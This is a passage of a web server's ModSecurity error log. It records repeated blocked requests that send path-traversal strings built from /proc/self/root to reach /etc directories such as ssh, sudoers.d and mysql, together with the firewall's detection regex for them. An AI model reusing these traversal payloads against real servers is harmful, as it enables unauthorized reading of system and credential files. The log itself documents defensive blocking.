"ablOg5qmL8PQht4WJFlLegAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:21.291630 2026] [:error] [pid 17965:tid 140411632822016] [client 74.7.243.203:44472] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOhat8Nd0UC_OcbVGyAAAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:22.647254 2026] [:error] [pid 2325:tid 140411674785536] [client 74.7.243.203:44474] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOhu82sZHvlq4xgHrFuwAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:23.974531 2026] [:error] [pid 2159:tid 140411548894976] [client 74.7.243.203:44488] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOh_ct6CQ8jnRyg2p-0wAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:25.311364 2026] [:error] [pid 11293:tid 140411599251200] [client 74.7.243.203:44496] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOidCmCSWTlPouqorO7AAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:26.703940 2026] [:error] [pid 11469:tid 140411632822016] [client 74.7.243.203:44506] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOipDEJR9VXonE_-1SdwAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:28.050188 2026] [:error] [pid 2553:tid 140411649607424] [client 74.7.243.203:44516] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOjP0Bec_B9OkZP_i_1gAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:30.081967 2026] [:error] [pid 11293:tid 140411548894976] [client 74.7.241.46:57174] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOjtCmCSWTlPouqorO8gAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:30.083297 2026] [:error] [pid 1210:tid 140411683178240] [client 74.7.243.203:44532] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOjVKJy4A1bGlmj9BYhgAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:31.590933 2026] [:error] [pid 2553:tid 140411582465792] [client 74.7.243.203:37700] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOj_0Bec_B9OkZP_i_2wAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:33.018048 2026] [:error] [pid 17965:tid 140411582465792] [client 74.7.243.203:37714] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOkat8Nd0UC_OcbVGyAwAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:33.415389 2026] [:error] [pid 2553:tid 140411548894976] [client 74.7.241.46:60914] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOkf0Bec_B9OkZP_i_3AAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:52:34.217108 2026] [:error] [pid 7437:tid 140411540502272] [client 74.7.243.203:37726] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOkgeiSKl8TjouI-YFMgAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:35.562962 2026] [:error] [pid 11469:tid 140411582465792] [client 74.7.243.203:37738] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOk5DEJR9VXonE_-1SegAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:37.004305 2026] [:error] [pid 2553:tid 140411624429312] [client 74.7.243.203:37744] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOlf0Bec_B9OkZP_i_3gAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:38.349125 2026] [:error] [pid 11469:tid 140411683178240] [client 74.7.243.203:37746] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOlpDEJR9VXonE_-1SfgAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:39.588107 2026] [:error] [pid 1016:tid 140411548894976] [client 74.7.243.203:37758] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOl5qmL8PQht4WJFlLhwAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:40.944330 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.243.203:34512] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOmKBJNF7axNlVR0X_2gAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:42.251043 2026] [:error] [pid 2159:tid 140411699963648] [client 74.7.243.203:34514] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOmvct6CQ8jnRyg2p-2AAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:43.626211 2026] [:error] [pid 1731:tid 140411624429312] [client 74.7.243.203:34526] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOmwb2qCuy5irgBMjL3QAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:45.028524 2026] [:error] [pid 1731:tid 140411624429312] [client 74.7.243.203:34534] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOnQb2qCuy5irgBMjL3wAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:46.485293 2026] [:error] [pid 2325:tid 140411582465792] [client 74.7.243.203:34538] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOnu82sZHvlq4xgHrFwgAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:47.881338 2026] [:error] [pid 11293:tid 140411658000128] [client 74.7.243.203:34552] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] 